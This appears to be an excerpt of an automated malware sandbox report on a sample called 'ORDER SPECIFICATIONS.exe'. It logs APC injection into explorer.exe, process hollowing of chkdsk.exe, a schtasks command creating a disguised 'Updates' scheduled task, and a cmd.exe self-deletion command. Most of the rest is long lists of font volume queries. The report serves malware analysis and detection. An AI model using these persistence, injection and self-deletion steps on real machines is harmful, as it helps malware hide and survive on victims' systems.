            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeThread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 11D0000
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp'
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess created: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeProcess created: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe'
            Source: explorer.exe, 00000007.00000000.259338956.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.502036700.0000000007BF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000000.259338956.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.502036700.0000000007BF0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.259338956.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.502036700.0000000007BF0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
            Source: explorer.exe, 00000007.00000000.258833766.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
            Source: explorer.exe, 00000007.00000000.259338956.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.502036700.0000000007BF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
            Source: explorer.exe, 00000007.00000000.259338956.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000010.00000002.502036700.0000000007BF0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
